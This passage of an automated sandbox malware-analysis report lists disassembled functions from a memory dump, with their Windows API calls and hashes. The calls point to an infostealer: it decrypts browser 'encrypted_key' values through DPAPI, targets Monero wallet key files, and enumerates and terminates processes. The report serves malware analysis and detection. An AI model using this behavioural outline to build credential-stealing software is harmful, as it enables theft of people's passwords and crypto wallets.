                                • API String ID: 211194620-0
                                • Opcode ID: 52c5f8b88498a41bd6f7d0ed7b59c4d9d7e85032cff0cdcd0a784a1078e8412d
                                • Instruction ID: 915c56758af456ec62a5f917a4d94e2ee9f47770cbb78c142e8921d15755af60
                                • Opcode Fuzzy Hash: 52c5f8b88498a41bd6f7d0ed7b59c4d9d7e85032cff0cdcd0a784a1078e8412d
                                • Instruction Fuzzy Hash: AE8104729102099BDB04FBB4DD9AEEE7B38BF94300F508519F547A60D1EF346A09CB66
                                Function 00503560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 163dc156244e544f65fa18ede2e1da686d11a5e257e38575cb7c35e7e5bdb673
                                • Instruction ID: d50a96fca61134b9ac43fd72d2690a88a8fe6b7ae8e0d73783004d9bc6c287b5
                                • Opcode Fuzzy Hash: 163dc156244e544f65fa18ede2e1da686d11a5e257e38575cb7c35e7e5bdb673
                                • Instruction Fuzzy Hash: 27411F71D10209ABDB04EFA4D88AEFEBB78BF54304F008418E516662D0EB75AA45CFA1
                                Function 004F9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 004F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004F99EC
                                  • Part of subcall function 004F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004F9A11
                                  • Part of subcall function 004F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004F9A31
                                  • Part of subcall function 004F99C0: ReadFile.KERNEL32(000000FF,?,00000000,004F148F,00000000), ref: 004F9A5A
                                  • Part of subcall function 004F99C0: LocalFree.KERNEL32(004F148F), ref: 004F9A90
                                  • Part of subcall function 004F99C0: CloseHandle.KERNEL32(000000FF), ref: 004F9A9A
                                  • Part of subcall function 00508E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00508E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004F9D39
                                  • Part of subcall function 004F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9AEF
                                  • Part of subcall function 004F9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,004F4EEE,00000000,?), ref: 004F9B01
                                  • Part of subcall function 004F9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NO,00000000,00000000), ref: 004F9B2A
                                  • Part of subcall function 004F9AC0: LocalFree.KERNEL32(?,?,?,?,004F4EEE,00000000,?), ref: 004F9B3F
                                  • Part of subcall function 004F9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004F9B84
                                  • Part of subcall function 004F9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 004F9BA3
                                  • Part of subcall function 004F9B60: LocalFree.KERNEL32(?), ref: 004F9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: 0627715bd5d653d363c9dd0f374fa005081b25cc60868bdd9187db7e7e4c1992
                                • Instruction ID: b118b69144e23ae8491b628b1ef8d1908932df071c7db525aac66f50b3bf9856
                                • Opcode Fuzzy Hash: 0627715bd5d653d363c9dd0f374fa005081b25cc60868bdd9187db7e7e4c1992
                                • Instruction Fuzzy Hash: 99312DB5D1020EABDB14EBA4DC85FFFB7B8BB48304F144559EA05A7241E7349E04CBA5
                                Function 005094D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 005094EB
                                  • Part of subcall function 00508D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0050951E,00000000), ref: 00508D5B
                                  • Part of subcall function 00508D50: RtlAllocateHeap.NTDLL(00000000), ref: 00508D62
                                  • Part of subcall function 00508D50: wsprintfW.USER32 ref: 00508D78
                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005095AB
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 005095C9
                                • CloseHandle.KERNEL32(00000000), ref: 005095D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID:
                                • API String ID: 3729781310-0
                                • Opcode ID: 73e12e7c1cb6feefeca42b2a645c0694c48470796fdd073ee5f78c56ab2ece36
                                • Instruction ID: d3940e824783b65ed0b5c582d8e5a2812f9b3bf7dc1249c146922bf2009d6741
                                • Opcode Fuzzy Hash: 73e12e7c1cb6feefeca42b2a645c0694c48470796fdd073ee5f78c56ab2ece36
                                • Instruction Fuzzy Hash: 67311E71A01208AFDB14DFD0CD4ABEDB774FF44301F108459E506AA1C9DB789A49CB55
                                Function 00508680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005105B7), ref: 005086CA
                                • Process32First.KERNEL32(?,00000128), ref: 005086DE
                                • Process32Next.KERNEL32(?,00000128), ref: 005086F3
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • CloseHandle.KERNEL32(?), ref: 00508761
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: b0d417c244eaa9a1461150b02029430b9c40f1b7697285dac5026c380f382dc3
                                • Instruction ID: a3c25fbfc955fd6bf35174cec99b6323f0f3f9133c8170cd3ff314c8b3d8eddc
                                • Opcode Fuzzy Hash: b0d417c244eaa9a1461150b02029430b9c40f1b7697285dac5026c380f382dc3
                                • Instruction Fuzzy Hash: 60315C71901219ABDB24DF50CC45FEEBB78FF85700F108599A10AA21E0DB746A45CFA1
                                Function 00507980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00510E00,00000000,?), ref: 005079B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 005079B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00510E00,00000000,?), ref: 005079C4
                                • wsprintfA.USER32 ref: 005079F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 59a3401c5b9d8dbf36c47bc29df83552014fa7848ba0002fb234a95d96153ff9
                                • Instruction ID: 91e10bf022c19499b8f85bd9762f11b4133d41e162297fa71118282fa7f4113d
                                • Opcode Fuzzy Hash: 59a3401c5b9d8dbf36c47bc29df83552014fa7848ba0002fb234a95d96153ff9
                                • Instruction Fuzzy Hash: B9112AB2904118ABDB14DFC9DD46BBEBBF8FB4CB12F10811AF645A2280D23D5940CBB5
                                Function 0050C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 0050C74E
                                  • Part of subcall function 0050BF9F: __amsg_exit.LIBCMT ref: 0050BFAF
                                • __getptd.LIBCMT ref: 0050C765
                                • __amsg_exit.LIBCMT ref: 0050C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0050C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: c60e411f21fd839c119fa28192138bb2b2b298377100a930a607090a16b83136
                                • Instruction ID: 67b8918670c8c310a7e3a3293c1509bc9a6af4b4e77d8c42675c7f0ca51c4108
                                • Opcode Fuzzy Hash: c60e411f21fd839c119fa28192138bb2b2b298377100a930a607090a16b83136
                                • Instruction Fuzzy Hash: 79F09A329407029BE721BBB8988FB8E3FA0BF81720F20424DF414A72D2DB6469419E56
                                Function 00504F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00508DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00508E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00504F7A
                                • lstrcat.KERNEL32(?,00511070), ref: 00504F97
                                • lstrcat.KERNEL32(?,012D8AA0), ref: 00504FAB
                                • lstrcat.KERNEL32(?,00511074), ref: 00504FBD
                                  • Part of subcall function 00504910: wsprintfA.USER32 ref: 0050492C
                                  • Part of subcall function 00504910: FindFirstFileA.KERNEL32(?,?), ref: 00504943
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,00510FDC), ref: 00504971
                                  • Part of subcall function 00504910: StrCmpCA.SHLWAPI(?,00510FE0), ref: 00504987
                                  • Part of subcall function 00504910: FindNextFileA.KERNEL32(000000FF,?), ref: 00504B7D
                                  • Part of subcall function 00504910: FindClose.KERNEL32(000000FF), ref: 00504B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: d6368f37666929ee00c9987c5a5158b7562525fc91352ef66726201a8fddb610
                                • Instruction ID: 71cea2ca14f7d2265ed7f9ecab251b44992c023565e6848259ef776742740044
                                • Opcode Fuzzy Hash: d6368f37666929ee00c9987c5a5158b7562525fc91352ef66726201a8fddb610
                                • Instruction Fuzzy Hash: 1D219876900209B7D754FB70DC4BEED373CBB94301F008558B6DA921D1EE799AC88B96